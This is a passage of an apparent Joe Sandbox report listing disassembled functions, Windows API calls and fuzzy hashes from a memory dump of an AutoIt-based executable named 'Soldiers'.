                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$FromString
                                                          • String ID:
                                                          • API String ID: 1211328463-0
                                                          • Opcode ID: 291a18972f93f51598b18f6b8991ddcaf2ecf058e273502566a078dcaa150bf8
                                                          • Instruction ID: 33bcd7c192d36277e246d8468b3047c8fbb590763555b65e24712c4feb4c34c3
                                                          • Opcode Fuzzy Hash: 291a18972f93f51598b18f6b8991ddcaf2ecf058e273502566a078dcaa150bf8
                                                          • Instruction Fuzzy Hash: 17219776604219EF9F10DFA8DC88DBF77ACEF48360B444525FA18DB2D0D6709C819B60
                                                          Function 0095685E Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00958475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009584A0
                                                          • #23.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009568B1
                                                          • #111.WSOCK32(00000000), ref: 009568C0
                                                          • #12.WSOCK32(00000000,8004667E,00000000), ref: 009568F9
                                                          • #4.WSOCK32(00000000,?,00000010), ref: 00956902
                                                          • #111.WSOCK32 ref: 0095690C
                                                          • #3.WSOCK32(00000000), ref: 00956935
                                                          • #12.WSOCK32(00000000,8004667E,00000000), ref: 0095694E
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: #111
                                                          • String ID:
                                                          • API String ID: 568940515-0
                                                          • Opcode ID: 189b0951e417a76021a63d5411395e352dba76a2a8ff9b21cdb0911bee2b8639
                                                          • Instruction ID: d4f3eede04399af94e1561c55d8f2a7017e74c5ece11d85b199cc6ab28e5c4cb
                                                          • Opcode Fuzzy Hash: 189b0951e417a76021a63d5411395e352dba76a2a8ff9b21cdb0911bee2b8639
                                                          • Instruction Fuzzy Hash: BF31C771600108EFDB10DF65CC85BBE77ADEB45726F044019FD09E7291DB74AC489BA2
                                                          Function 0093E360 Relevance: 10.6, APIs: 7, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093E3A5
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093E3CB
                                                          • #2.WSOCK32(00000000), ref: 0093E3CE
                                                          • #2.WSOCK32 ref: 0093E3EF
                                                          • #6.OLEAUT32 ref: 0093E3F8
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0093E412
                                                          • #2.WSOCK32(?), ref: 0093E420
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$FromString
                                                          • String ID:
                                                          • API String ID: 1211328463-0
                                                          • Opcode ID: c46b5e1576d2b8e1a4d7ed5807ae76761ac87ff0831bdff53a381288fe81568f
                                                          • Instruction ID: 09fa1df2d39395ff2dbb0768f99baf5c702c25f57268ae6d5c7340331e4148ca
                                                          • Opcode Fuzzy Hash: c46b5e1576d2b8e1a4d7ed5807ae76761ac87ff0831bdff53a381288fe81568f
                                                          • Instruction Fuzzy Hash: FC214936604209AFDB109FA8DC89DBE77ECEB4D360B408525F915CB2B0D674DC819B64
                                                          Function 0093FE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 1038674560-2734436370
                                                          • Opcode ID: 9c6c208add82091e14095f057691da8fa2ec3f4b2ce00a4a9dd162d6c1c76f80
                                                          • Instruction ID: 5c1367ead4371d4bd74edc296fd15e3d3debc760dcdabf118ddeaf1e6796a14c
                                                          • Opcode Fuzzy Hash: 9c6c208add82091e14095f057691da8fa2ec3f4b2ce00a4a9dd162d6c1c76f80
                                                          • Instruction Fuzzy Hash: B1212932504611AAD330AB34DC22FBB73DCEF91700F608436F59A861A3EBA59E468695
                                                          Function 00967BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,008E2004), ref: 008E214F
                                                            • Part of subcall function 008E2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,008E2004,?,?,static,00970980,?,?,?,00000096,00000096,?), ref: 008E2163
                                                            • Part of subcall function 008E2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,008E2004,?,?,static,00970980,?,?,?,00000096,00000096), ref: 008E216D
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00967C57
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00967C64
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00967C6F
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00967C7E
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00967C8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: 5bbaf7fe32f213969de66544317b112258b0b71b79b49f266bc70bcff513237b
                                                          • Instruction ID: edbbe4ad619c5cdf100c428fbfe8d10a93dd11fbfe15a09494ff50414bcffaca
                                                          • Opcode Fuzzy Hash: 5bbaf7fe32f213969de66544317b112258b0b71b79b49f266bc70bcff513237b
                                                          • Instruction Fuzzy Hash: 6F11E2B2110219BEEF108FA4CC86EE7BF5DEF48798F014110BA48A2090C776AC21DBA0
                                                          Function 00949ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00930817,?,?,00000000,00000000), ref: 00949EE8
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00930817,?,?,00000000,00000000), ref: 00949EFF
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00930817,?,?,00000000,00000000,?,?,?,?,?,?,008F4A14), ref: 00949F0F
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00930817,?,?,00000000,00000000,?,?,?,?,?,?,008F4A14), ref: 00949F20
                                                          • LockResource.KERNEL32(00930817,?,?,00930817,?,?,00000000,00000000,?,?,?,?,?,?,008F4A14,00000000), ref: 00949F2F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: ed398869af0fb44ad8e3cf42eb868a1693b5532911142f3618f999d0306ecea7
                                                          • Instruction ID: 1338e32f3023db75ff81f68dbcca034d52a9cf2a1cd3e75583990e16325fd1ce
                                                          • Opcode Fuzzy Hash: ed398869af0fb44ad8e3cf42eb868a1693b5532911142f3618f999d0306ecea7
                                                          • Instruction Fuzzy Hash: 87118E72204700BFE7248B25DC48F27BBBDEBC5B21F1442ACB519DA261DB71EC44D660
                                                          Function 00909D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 00909D16
                                                            • Part of subcall function 009033B7: EncodePointer.KERNEL32(00000000), ref: 009033BA
                                                            • Part of subcall function 009033B7: __initp_misc_winsig.LIBCMT ref: 009033D5
                                                            • Part of subcall function 009033B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0090A0D0
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0090A0E4
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0090A0F7
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0090A10A
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0090A11D
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0090A130
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0090A143
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0090A156
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0090A169
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0090A17C
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0090A18F
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0090A1A2
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0090A1B5
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0090A1C8
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0090A1DB
                                                            • Part of subcall function 009033B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0090A1EE
                                                          • __mtinitlocks.LIBCMT ref: 00909D1B
                                                          • __mtterm.LIBCMT ref: 00909D24
                                                            • Part of subcall function 00909D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00909D29,00907EFD,0099CD38,00000014), ref: 00909E86
                                                            • Part of subcall function 00909D8C: _free.LIBCMT ref: 00909E8D
                                                            • Part of subcall function 00909D8C: DeleteCriticalSection.KERNEL32(009A0C00,?,?,00909D29,00907EFD,0099CD38,00000014), ref: 00909EAF
                                                          • __calloc_crt.LIBCMT ref: 00909D49
                                                          • __initptd.LIBCMT ref: 00909D6B
                                                          • GetCurrentThreadId.KERNEL32 ref: 00909D72
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 3567560977-0
                                                          • Opcode ID: dd50839ccdea1c6a44f922a0ee04955069eaf6cad2298112b93499bdb22db01f
                                                          • Instruction ID: a9f7c50f317f68f9528d3358121b521e00ee1bb0db9d3c59f288bddcdbfa375d
                                                          • Opcode Fuzzy Hash: dd50839ccdea1c6a44f922a0ee04955069eaf6cad2298112b93499bdb22db01f
                                                          • Instruction Fuzzy Hash: 16F06D32AA97125EE6347B747C0374B26D8DFC2B30F204619F594D50D3EF1088414590
                                                          Function 008F50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001,009A8290,008F5328), ref: 008F5109
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F512A
                                                          • ShowWindow.USER32(00000000), ref: 008F513E
                                                          • ShowWindow.USER32(00000000), ref: 008F5147
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: aa9eff112cbc89a46224954043c13c7a00c6015c00f8d9d96691f904b44f063c
                                                          • Instruction ID: 5c5693e71c40399b502a5b0bffbc1f25d0f12dbced3fb20f84f04756d75242a5
                                                          • Opcode Fuzzy Hash: aa9eff112cbc89a46224954043c13c7a00c6015c00f8d9d96691f904b44f063c
                                                          • Instruction Fuzzy Hash: 1CF0DA72669294BEEA3117676C4EF276E7DDBC7F50F00411ABD14A21B0C6611891EAF0
                                                          Function 009041B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00904282,?), ref: 009041D3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 009041DA
                                                          • EncodePointer.KERNEL32(00000000), ref: 009041E6
                                                          • DecodePointer.KERNEL32(00000001,00904282,?), ref: 00904203
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoInitialize$combase.dll
                                                          • API String ID: 3489934621-340411864
                                                          • Opcode ID: 6ad4a889d65d32a8f31ca5cb22204e2cedd55eef03210a1b36f8eb9470869f54
                                                          • Instruction ID: 8b76d5b0214a57c5122a94fd55322818ae850f43364c94ff1a0a7e09864e12eb
                                                          • Opcode Fuzzy Hash: 6ad4a889d65d32a8f31ca5cb22204e2cedd55eef03210a1b36f8eb9470869f54
                                                          • Instruction Fuzzy Hash: A0E0E5B26BC701EFEA601B70EC4DB283669EB92B0AF608424B545D50E0DBB59485AB40
                                                          Function 0090428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009041A8), ref: 009042A8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 009042AF
                                                          • EncodePointer.KERNEL32(00000000), ref: 009042BA
                                                          • DecodePointer.KERNEL32(009041A8), ref: 009042D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: 7c0e7c869a41447a4fc659b787aaccfb70b61dc448cf84a53f68697bdb917720
                                                          • Instruction ID: a0dfdf05f7fc5fb724cbdb6a79c97cb9907bd13509d46a5d396f8bf9748c70bf
                                                          • Opcode Fuzzy Hash: 7c0e7c869a41447a4fc659b787aaccfb70b61dc448cf84a53f68697bdb917720
                                                          • Instruction Fuzzy Hash: 69E0B6B27BC700EFEB109B60AD0DB643A68BB81B0AF518114F519D50E0CBB48584FB50
                                                          Function 008E218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 008E21B8
                                                          • GetWindowRect.USER32(?,?), ref: 008E21F9
                                                          • ScreenToClient.USER32(?,?), ref: 008E2221
                                                          • GetClientRect.USER32(?,?), ref: 008E2350
                                                          • GetWindowRect.USER32(?,?), ref: 008E2369
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$Screen
                                                          • String ID:
                                                          • API String ID: 1296646539-0
                                                          • Opcode ID: 48d8376967ea242356031ed192169689a2a3dd84531d76d29af625c0bafaf988
                                                          • Instruction ID: 7f45ff84c078f4c7edd7d7eee31e510615dcde0082a55225e3a894d7c8f000e2
                                                          • Opcode Fuzzy Hash: 48d8376967ea242356031ed192169689a2a3dd84531d76d29af625c0bafaf988
                                                          • Instruction Fuzzy Hash: B5B15A39A00249DBDB10CFA9C9807EDB7B6FF49314F148129ED59EB254DB30AA90DB54
                                                          Function 00946A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memmove$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3253778849-0
                                                          • Opcode ID: 74ea84525dce9cf9cb45ebed87d7eec5124a5c88f8aad936b58b4cc10f9ab27e
                                                          • Instruction ID: e1d379f80b055eb36c23dbe43218ae0821a5e85e3a06361d4d5bddccad9fdd6e
                                                          • Opcode Fuzzy Hash: 74ea84525dce9cf9cb45ebed87d7eec5124a5c88f8aad936b58b4cc10f9ab27e
                                                          • Instruction Fuzzy Hash: 3B619A7050029AABCF11EF64CC82FBE37A8FF46308F044559F999AB292DB349945CB52
                                                          Function 00960844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                            • Part of subcall function 0096147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096040D,?,?), ref: 00961491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096091D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096095D
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00960980
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009609A9
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 009609EC
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 009609F9
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                          • String ID:
                                                          • API String ID: 4046560759-0
                                                          • Opcode ID: 128b32e2e1e3d9622c3624d876ddf17de8b7b85f80327aecd4aa668ef4832dc4
                                                          • Instruction ID: 4a2ff20a7f40613e78bbe02a3a27d1976cbe62ead645d20a3b7c4de513d3708b
